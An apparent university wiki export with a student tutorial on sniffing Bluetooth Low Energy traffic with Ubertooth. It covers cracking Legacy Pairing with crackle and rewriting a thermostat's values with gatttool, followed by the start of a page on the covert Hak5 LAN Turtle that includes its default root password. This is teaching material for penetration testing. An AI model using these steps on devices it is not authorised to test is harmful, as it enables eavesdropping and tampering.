&lt;br /&gt;
== Exploiting BLE ==&lt;br /&gt;
&lt;br /&gt;
After capturing the data it is possible to use additional third party tools in combination with Ubertooth to obtain critical information.&lt;br /&gt;
In the following this is outlined through the utilization of the tools &#039;&#039;crackle&#039;&#039; and &#039;&#039;gatttool&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
=== Crackle ===&lt;br /&gt;
&lt;br /&gt;
Crackle is a tool that attempts to decrypt BLE Encryption.&lt;br /&gt;
Crackle is the right tool if you have captured a connection based on BLE Legacy Pairing.&lt;br /&gt;
It can not decrypt LE Secure Connections based transmissions. The capture has to include the pairing process otherwise it&#039;s not gonna work.&lt;br /&gt;
Note that even if you are using Kali Linux the pre-installed version of crackle may be out of date without any possibility to update it through the respective repositories.&lt;br /&gt;
It is recommended that you use the master branch from crackle GitHub-repository [https://github.com/mikeryan/crackle].&lt;br /&gt;
&lt;br /&gt;
 git clone &amp;lt;nowiki&amp;gt;https://github.com/mikeryan/crackle.git&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 cd crackle&lt;br /&gt;
 make&lt;br /&gt;
&lt;br /&gt;
Now you can use the latest version of the tool by executing this command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;./crackle -i &amp;lt;nowiki&amp;gt;&amp;lt;your_file.pcap&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this test, the captured connection revealed that the thermostat used no encryption and the fitness tracker used LE Secure Connections.&lt;br /&gt;
In this regard, crackle was unsuccessful in both instances.&lt;br /&gt;
When applied to the thermostat connection the output looked like this:&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle thermostat.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is due to the fact that the thermostat connection has no encryption. Naturally, there is nothing to break. Note that you can receive a similar result if the connection uses some form of encryption but ubertooth fails to capture the respective packets. Ubertooth cannot track 100% of the transmissions. &lt;br /&gt;
In the case of the fitness tracker the output clearly states that the device is running LE Secure Connections.&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle fitnesstracker.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To show that crackle can indeed decrypt keys of Legacy Pairing connections we run the tool on the sample data provided [https://lacklustre.net/bluetooth/crackle-sample.tgz here].&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle sampledata.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
=== Gatttool ===&lt;br /&gt;
&lt;br /&gt;
The utility &#039;&#039;gatttool&#039;&#039; can be used to manipulate characteristics attribute-values.&lt;br /&gt;
In the following we change the temperature value of the thermostat.&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; Some connections require you to change the address type to random. You can do that with &amp;lt;code&amp;gt;-t random&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Connect to your device using the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;gatttool -b 78:A5:04:62:71:3D -I&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will give you a prompt. Type &amp;quot;connect&amp;quot; to innitiate pairing with the device:&lt;br /&gt;
 &lt;br /&gt;
 [78:A5:04:62:71:3D][LE]&amp;gt; connect&lt;br /&gt;
 Attempting to connect to 78:A5:04:62:71:3D&lt;br /&gt;
 Connection successful&lt;br /&gt;
 &#039;&#039;&#039;[78:A5:04:62:71:3D]&#039;&#039;&#039;[LE]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now you can use a variety of commands to send read/write requests to your connected device:&lt;br /&gt;
:* &amp;lt;code&amp;gt;characteristics&amp;lt;/code&amp;gt; will list all characteristics and their respective handles available on the device&lt;br /&gt;
:* &amp;lt;code&amp;gt;char-read-hnd 25&amp;lt;/code&amp;gt; will read the characteristics value of handle 0x0025&lt;br /&gt;
:* &amp;lt;code&amp;gt;char-write-req 25 &amp;lt;nowiki&amp;gt;&amp;lt;value&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt; will write &#039;&#039;value&#039;&#039; to handle 0x0025&lt;br /&gt;
&lt;br /&gt;
Find out the handles you need to address by analyzing the captured BLE connection.&lt;br /&gt;
&lt;br /&gt;
== Student Project ==&lt;br /&gt;
=== Summary ===&lt;br /&gt;
These are the results of a student project on Bluetooth hacking using an [[Ubertooth One, 2.4 GHz wireless development platform]]&lt;br /&gt;
=== Requirements ===&lt;br /&gt;
&lt;br /&gt;
To produce the results, the book [[Hacking Internet of Things]] was used.&lt;br /&gt;
&lt;br /&gt;
The [[Ubertooth One, 2.4 GHz wireless development platform|Ubertooth]] was tested on the following devices:&lt;br /&gt;
&lt;br /&gt;
* [[Osram Ledvance Smart+ Multicolor HomeKit Classic A60 10W E27]]&lt;br /&gt;
* [[DOG&amp;amp;BONE® Bluetooth-Vorhängeschloss, Rot]]&lt;br /&gt;
* [[EQIVA Bluetooth Smart Türschlossantrieb]]&lt;br /&gt;
&lt;br /&gt;
=== Authors ===&lt;br /&gt;
&lt;br /&gt;
The project was conducted for the course [[Einführendes Wahlfachprojekt]] in the summer term 2018 by the bachelor students:&lt;br /&gt;
&lt;br /&gt;
* Stefan Buschbeck&lt;br /&gt;
* Stefan Trinko&lt;br /&gt;
* Sebastian Ukleja&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Used Hardware ===&lt;br /&gt;
&lt;br /&gt;
* [[Ubertooth One, 2.4 GHz wireless development platform]]&lt;br /&gt;
* [[Room Thermostat Bluetooth ]]&lt;br /&gt;
* [[Mi band 4 fitness tracker]]&lt;br /&gt;
&lt;br /&gt;
=== Results ===&lt;br /&gt;
&lt;br /&gt;
* A [[:File:BLE Hacking Buschbeck Trinko Ukleja.pdf|documentation]] about the Bluetooth protocol itself and the analysis of the students&lt;br /&gt;
* The [[:File:Capture Files BLE.zip|capture files]] produced with the [[Ubertooth One, 2.4 GHz wireless development platform|Ubertooth]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.bluetooth.com/specifications/bluetooth-core-specification/&lt;br /&gt;
* https://github.com/greatscottgadgets/ubertooth/wiki&lt;br /&gt;
* https://github.com/mikeryan/crackle&lt;br /&gt;
* &lt;br /&gt;
[[File:Pentesting in IoT Bluetooth Sniffing.pdf]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Bluetooth_Sniffing_with_Ubertooth:_A_Step-by-step_guide&amp;diff=6086</id>
		<title>Bluetooth Sniffing with Ubertooth: A Step-by-step guide</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bluetooth_Sniffing_with_Ubertooth:_A_Step-by-step_guide&amp;diff=6086"/>
		<updated>2021-03-05T14:35:33Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Crackle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This is a tutorial on how to sniff Bluetooth Low Energy (BLE) packets using the [[Ubertooth One, 2.4 GHz wireless development platform]] device.&lt;br /&gt;
This guide will detail the setup process and outline every step to capture a BLE connection. Furthermore, it will provide methods of bluetooth hacking, i.e cracking the encryption of a BLE connection and overwriting characteristics of a device.&lt;br /&gt;
This tutorial is created in regard to the seminar paper: [[File:Pentesting in IoT Bluetooth Sniffing.pdf]]&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Linux-based Operating system: this test used [https://www.kali.org/downloads/ Kali Linux 64-Bit v2019.4 native install]&lt;br /&gt;
* BLE devices &lt;br /&gt;
* Tools: crackle, gatttool&lt;br /&gt;
&lt;br /&gt;
== BLE Fundamentals ==&lt;br /&gt;
&lt;br /&gt;
Fundamentals of the BLE Standard can be found at the [[BLE Fundamentals]] documentation.&lt;br /&gt;
&lt;br /&gt;
== Capturing BLE packets ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 - Prerequisites  ===&lt;br /&gt;
&lt;br /&gt;
Ubertooth One offers a well-documented GitHub-repository [https://github.com/greatscottgadgets/ubertooth/wiki]. Follwowing its instructions, the device&#039;s tools require several components. To fulfill the demands, one has to install:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config python3-numpy python3-qtpy&amp;lt;/code&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
In contrast to the guide, the &#039;&#039;python-pyside&#039;&#039; component needs to be installed separately using the &#039;&#039;pip-installer&#039;&#039;: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;pip install pyside3&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In order to for Ubertooth tools to decode Bluetooth packets the Bluetooth baseband library (&#039;&#039;libbtbb&#039;&#039;) needs to be downloaded and installed:&lt;br /&gt;
&lt;br /&gt;
 wget &amp;lt;nowiki&amp;gt;https://github.com/greatscottgadgets/libbtbb/archive/2018-12-R1.tar.gz -O libbtbb-2018-12-R1.tar.gz&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 tar -xf libbtbb-2018-12-R1.tar.gz&lt;br /&gt;
 cd libbtbb-2018-12-R1&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
 sudo ldconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Following that, the Ubertooth tools can be downloaded from the GitHub repository. They include host code, which enables sniffing Bluetooth packets. Additionally, they provide means to configure the Ubertooth device, including a simplified method for a firmware update.&lt;br /&gt;
&lt;br /&gt;
 wget &amp;lt;nowiki&amp;gt;https://github.com/greatscottgadgets/ubertooth/releases/download/2018-12-R1/ubertooth-2018-12-R1.tar.xz&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 tar xf ubertooth-2018-12-R1.tar.xz&lt;br /&gt;
 cd ubertooth-2018-12-R1/host&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
 sudo ldconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Wireshark Bluetooth Baseband (&#039;&#039;BTBB&#039;&#039;) and Basic Rate/Enhanced Data Rate (&#039;&#039;BR/EDR&#039;&#039;) plugins facilitate the analysis of Bluetooth baseband traffic that has been captured within the Wireshark GUI. &lt;br /&gt;
The plugins need to be installed both separately from the &#039;&#039;libbtbb&#039;&#039; library. For the BTBB plugin the following commands have been used:&lt;br /&gt;
&lt;br /&gt;
 sudo apt-get install wireshark wireshark-dev libwireshark-dev cmake&lt;br /&gt;
 cd libbtbb-2018-12-R1/wireshark/plugins/btbb&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake -DCMAKE_INSTALL_LIBDIR=/usr/lib/x86_64-linux-gnu/wireshark/libwireshark3/plugins ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
&lt;br /&gt;
It is important to state that the &#039;&#039;MAKE_INSTALL_LIBDIR&#039;&#039; directory can vary depending on the OS used and the wireshark installation. However, it should be the directory of existing Wireshark plugins.&lt;br /&gt;
The procedure needs to be repeated for the &#039;&#039;BR/EDR&#039;&#039; plugin.&lt;br /&gt;
&lt;br /&gt;
 cd libbtbb-2018-12-R1/wireshark/plugins/btbredr&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake -DCMAKE_INSTALL_LIBDIR=/usr/lib/x86_64-linux-gnu/wireshark/libwireshark3/plugins ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
&lt;br /&gt;
=== Step 2 - Verification &amp;amp; Firmware Update ===&lt;br /&gt;
&lt;br /&gt;
After installing the prerequisits, the Ubertooth One device was plugged in through a USB port. It is of utmost importance to operate the Ubertooth One with the antenna attached to it. Otherwise, there is a risk of damaging the device. After inserting the device, verify that the system detects it:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will display information about USB buses in the system and the devices connected to them:&lt;br /&gt;
&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 001 Device 005: ID 04f2:b595 Chicony Electronics Co., Camera&lt;br /&gt;
 Bus 001 Device 004: ID 138a:003f Validity Sensors, Inc. VFS495&lt;br /&gt;
 Bus 001 Device 003: ID 8087:0a2b Intel Corp.&lt;br /&gt;
 Bus 001 Device 002: ID 1ea7:0064 SHARKOON Technologies 2.4G Mouse&lt;br /&gt;
 Bus 001 Device 014: ID 1d50:6002 &#039;&#039;&#039;OpenMoko, Inc. Ubertooth One&#039;&#039;&#039;&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upon first operation of the Ubertooth One it is necessary to update its firmware. The tools, which were downloaded before, facilitate a simplified way to achieve this task. Change the directory to the firmware directory of Ubertooth and execute the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-dfu -d bluetooth_rxtx.dfu -r&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the update is successful, this output will be produced:&lt;br /&gt;
&lt;br /&gt;
 Switching to DFU mode...&lt;br /&gt;
 Checking firmware signature&lt;br /&gt;
 ........................................&lt;br /&gt;
 ........................................&lt;br /&gt;
 ........................................&lt;br /&gt;
 Detached&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To verify the firmware-version enter the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-util -v&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 3 - Ubertooth Spectrum Analyzer ===&lt;br /&gt;
&lt;br /&gt;
It is recommended to validate the functionality of the Ubertooth device via the spectrum analyzer, which is a tool to analyze the 2.4GHz band.&lt;br /&gt;
Specifically, it provides a Graphical User Interface (GUI) tool named ubertooth-specan-ui, which visually monitors the frequencies. This command will start the spectrum analyzer:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-specan-ui&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Once successful, you can see the analyzer work its task through a powerful GUI:&lt;br /&gt;
&lt;br /&gt;
[[File:Ubertooth Spectrum Analyzer.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this case the figure shows several 802.11b networks in different channels, represented by green amplitudes.&lt;br /&gt;
The white amplitudes depict beacons that are visible during scanning. The red lines adjust to different centers of frequency channels in the 2.4GHz radio band.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 4 - Intercepting Lower Address Part (LAP) Packets ===&lt;br /&gt;
&lt;br /&gt;
The &#039;&#039;BD_ADDR&#039;&#039; makes the allocation of sniffed Bluetooth packets possible. The Ubertooth One can start the LAP scan with this command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-rx&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A continuous output will follow on the console:&lt;br /&gt;
&lt;br /&gt;
 systime=1578428685 ch=26 LAP=3a5138 err=1 clkn=8355 clk_offset=5199 s=-80 n=-55 snr=-25&lt;br /&gt;
 systime=1578428688 ch=26 LAP=3a5138 err=1 clkn=18479 clk_offset=5628 s=-81 n=-55 snr=-26&lt;br /&gt;
 systime=1578428692 ch=43 LAP=3a5138 err=2 clkn=28967 clk_offset=6029 s=-80 n=-55 snr=-25&lt;br /&gt;
 systime=1578428692 ch=47 LAP=3a5138 err=2 clkn=30327 clk_offset=6069 s=-81 n=-55 snr=-26&lt;br /&gt;
 systime=1578428694 ch=52 LAP=3a5138 err=1 clkn=36948 clk_offset=87 s=-79 n=-55 snr=-24&lt;br /&gt;
 systime=1578428696 ch=53 LAP=3a5138 err=0 clkn=42360 clk_offset=302 s=-77 n=-55 snr=-22&lt;br /&gt;
&lt;br /&gt;
In the output &#039;&#039;&#039;ch&#039;&#039;&#039; represents the channel used by the device referenced in the LAP value. &lt;br /&gt;
The channel hopping is clearly comprehensible. &#039;&#039;&#039;Clkn&#039;&#039;&#039; indicates the master`s clock, while &#039;&#039;&#039;s&#039;&#039;&#039; references the signal strength and &#039;&#039;&#039;n&#039;&#039;&#039; states the value of noise.&lt;br /&gt;
Following that the &#039;&#039;&#039;snr&#039;&#039;&#039; value represents the signal-to-noise ratio. &lt;br /&gt;
This mode is especially helpful for undiscoverable devices, because it can calculate a BD_ADDR through the LAP in combination with the other parameters.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Alternatively, if the devices are discoverable, you can use the BLE scan of hcitools:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo hcitool lescan&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Among eventual other devices you should see the BLE devices you are testing, in this case the thermostat and the fitness tracker:&lt;br /&gt;
 &lt;br /&gt;
 D5:AA:D0:41:A3:60 Mi Smart Band 4&lt;br /&gt;
 78:A5:04:62:71:3D TepHeatB&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 5 - The Ubertooth-BTLE Tool ===&lt;br /&gt;
&lt;br /&gt;
One of the most powerful tools the Ubertooth One provides is the Bluetooth Low Energy sniffing mode.&lt;br /&gt;
Among other things, it can sniff and follow connections and even interfere with them.&lt;br /&gt;
In the &amp;quot;follow&amp;quot; mode, Ubertooth listens on one of the three advertising channels.&lt;br /&gt;
Once a BLE connection is established (on the advertising channel the device has been listenting to), Ubertooth will follow the hops along the data channels capturing the transmissions between the devices.&lt;br /&gt;
Per default, Ubertooth can be used to follow any connection it observes randomly.&lt;br /&gt;
Naturally, the device can be restricted to observe a specific device by providing the &#039;&#039;BD_ADDR&#039;&#039; of the device in question.&lt;br /&gt;
The general syntax of the corresponding command for &amp;quot;follow&amp;quot; mode looks like:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f &amp;lt;nowiki&amp;gt;&amp;lt;BD_ADDR&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Simply replace the &#039;&#039;BD_ADDR&#039;&#039; with the address you found out earlier:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f 78:A5:04:62:71:3D&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will produce a continuous output in the console.&lt;br /&gt;
&lt;br /&gt;
Furthermore, it is possible to redirect the output into a file or a pipe.&lt;br /&gt;
To achieve this, the syntax requires this generic command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f &amp;lt;nowiki&amp;gt;&amp;lt;BD_ADDR&amp;gt; -c &amp;lt;file or pipe&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 6 - Wireshark Analysis ===&lt;br /&gt;
&lt;br /&gt;
It is also possible to analyze the captured BLE packets in Wireshark. &lt;br /&gt;
For this purpose create a pipe via:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;mkfifo /tmp/pipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Following that, a new interface needs to be added to Wireshark in order to use the just created pipe.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark manage interface.png|frameless|450px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For this, the custom pipe &#039;&#039;/tmp/mypipe&#039;&#039; was added to the list of interfaces.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark add pipe.png|frameless|450px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now repeat the command from Step 5, but now with a redirected ouput to the pipe:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f 78:A5:04:62:71:3D -c /tmp/pipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Select the custom interface you have just created in Wireshark to be able to analyze packtets with enhanced visibility and additional information.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark Thermo ConnectReq.png|frameless|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Exploiting BLE ==&lt;br /&gt;
&lt;br /&gt;
After capturing the data it is possible to use additional third party tools in combination with Ubertooth to obtain critical information.&lt;br /&gt;
In the following this is outlined through the utilization of the tools &#039;&#039;crackle&#039;&#039; and &#039;&#039;gatttool&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
=== Crackle ===&lt;br /&gt;
&lt;br /&gt;
Crackle is a tool that attempts to decrypt BLE Encryption.&lt;br /&gt;
Crackle is the right tool if you have captured a connection based on BLE Legacy Pairing.&lt;br /&gt;
It can not decrypt LE Secure Connections based transmissions. The capture has to include the pairing process otherwise it&#039;s not gonna work.&lt;br /&gt;
Note that even if you are using Kali Linux the pre-installed version of crackle may be out of date without any possibility to update it through the respective repositories.&lt;br /&gt;
It is recommended that you use the master branch from crackle GitHub-repository [https://github.com/mikeryan/crackle].&lt;br /&gt;
&lt;br /&gt;
 git clone &amp;lt;nowiki&amp;gt;https://github.com/mikeryan/crackle.git&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 cd crackle&lt;br /&gt;
 make&lt;br /&gt;
&lt;br /&gt;
Now you can use the latest version of the tool by executing this command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;./crackle -i &amp;lt;nowiki&amp;gt;&amp;lt;your_file.pcap&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this test, the captured connection revealed that the thermostat used no encryption and the fitness tracker used LE Secure Connections.&lt;br /&gt;
In this regard, crackle was unsuccessful in both instances.&lt;br /&gt;
When applied to the thermostat connection the output looked like this:&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle thermostat.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is due to the fact that the thermostat connection has no encryption. Naturally, there is nothing to break. Note that you can receive a similar result if the connection uses some form of encryption but ubertooth fails to capture the respective packets. Ubertooth cannot track 100% of the transmissions. &lt;br /&gt;
In the case of the fitness tracker the output clearly states that the device is running LE Secure Connections.&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle fitnesstracker.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To show that crackle can indeed decrypt keys of Legacy Pairing connections we run the tool on the sample data provided [https://lacklustre.net/bluetooth/crackle-sample.tgz here].&lt;br /&gt;
&lt;br /&gt;
[[File:Crackle sampledata.png|frameless|600px]]&lt;br /&gt;
&lt;br /&gt;
=== Gatttool ===&lt;br /&gt;
&lt;br /&gt;
The utility &#039;&#039;gatttool&#039;&#039; can be used to manipulate characteristics attribute-values.&lt;br /&gt;
In the following we change the temperature value of the thermostat.&lt;br /&gt;
&lt;br /&gt;
Connect to your device using the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;gatttool -b 78:A5:04:62:71:3D -I&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will give you a prompt. Type &amp;quot;connect&amp;quot; to innitiate pairing with the device:&lt;br /&gt;
 &lt;br /&gt;
 [78:A5:04:62:71:3D][LE]&amp;gt; connect&lt;br /&gt;
 Attempting to connect to 78:A5:04:62:71:3D&lt;br /&gt;
 Connection successful&lt;br /&gt;
 &#039;&#039;&#039;[78:A5:04:62:71:3D]&#039;&#039;&#039;[LE]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now you can use a variety of commands to send read/write requests to your connected device:&lt;br /&gt;
:* &amp;lt;code&amp;gt;characteristics&amp;lt;/code&amp;gt; will list all characteristics and their respective handles available on the device&lt;br /&gt;
:* &amp;lt;code&amp;gt;char-read-hnd 25&amp;lt;/code&amp;gt; will read the characteristics value of handle 0x0025&lt;br /&gt;
:* &amp;lt;code&amp;gt;char-write-req 25 &amp;lt;nowiki&amp;gt;&amp;lt;value&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt; will write &#039;&#039;value&#039;&#039; to handle 0x0025&lt;br /&gt;
&lt;br /&gt;
Find out the handles you need to address by analyzing the captured BLE connection.&lt;br /&gt;
&lt;br /&gt;
== Student Project ==&lt;br /&gt;
=== Summary ===&lt;br /&gt;
These are the results of a student project on Bluetooth hacking using an [[Ubertooth One, 2.4 GHz wireless development platform]]&lt;br /&gt;
=== Requirements ===&lt;br /&gt;
&lt;br /&gt;
To produce the results, the book [[Hacking Internet of Things]] was used.&lt;br /&gt;
&lt;br /&gt;
The [[Ubertooth One, 2.4 GHz wireless development platform|Ubertooth]] was tested on the following devices:&lt;br /&gt;
&lt;br /&gt;
* [[Osram Ledvance Smart+ Multicolor HomeKit Classic A60 10W E27]]&lt;br /&gt;
* [[DOG&amp;amp;BONE® Bluetooth-Vorhängeschloss, Rot]]&lt;br /&gt;
* [[EQIVA Bluetooth Smart Türschlossantrieb]]&lt;br /&gt;
&lt;br /&gt;
=== Authors ===&lt;br /&gt;
&lt;br /&gt;
The project was conducted for the course [[Einführendes Wahlfachprojekt]] in the summer term 2018 by the bachelor students:&lt;br /&gt;
&lt;br /&gt;
* Stefan Buschbeck&lt;br /&gt;
* Stefan Trinko&lt;br /&gt;
* Sebastian Ukleja&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Used Hardware ===&lt;br /&gt;
&lt;br /&gt;
* [[Ubertooth One, 2.4 GHz wireless development platform]]&lt;br /&gt;
* [[Room Thermostat Bluetooth ]]&lt;br /&gt;
* [[Mi band 4 fitness tracker]]&lt;br /&gt;
&lt;br /&gt;
=== Results ===&lt;br /&gt;
&lt;br /&gt;
* A [[:File:BLE Hacking Buschbeck Trinko Ukleja.pdf|documentation]] about the Bluetooth protocol itself and the analysis of the students&lt;br /&gt;
* The [[:File:Capture Files BLE.zip|capture files]] produced with the [[Ubertooth One, 2.4 GHz wireless development platform|Ubertooth]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.bluetooth.com/specifications/bluetooth-core-specification/&lt;br /&gt;
* https://github.com/greatscottgadgets/ubertooth/wiki&lt;br /&gt;
* https://github.com/mikeryan/crackle&lt;br /&gt;
* &lt;br /&gt;
[[File:Pentesting in IoT Bluetooth Sniffing.pdf]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6085</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6085"/>
		<updated>2021-03-04T14:07:19Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Step 3: Exploit */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
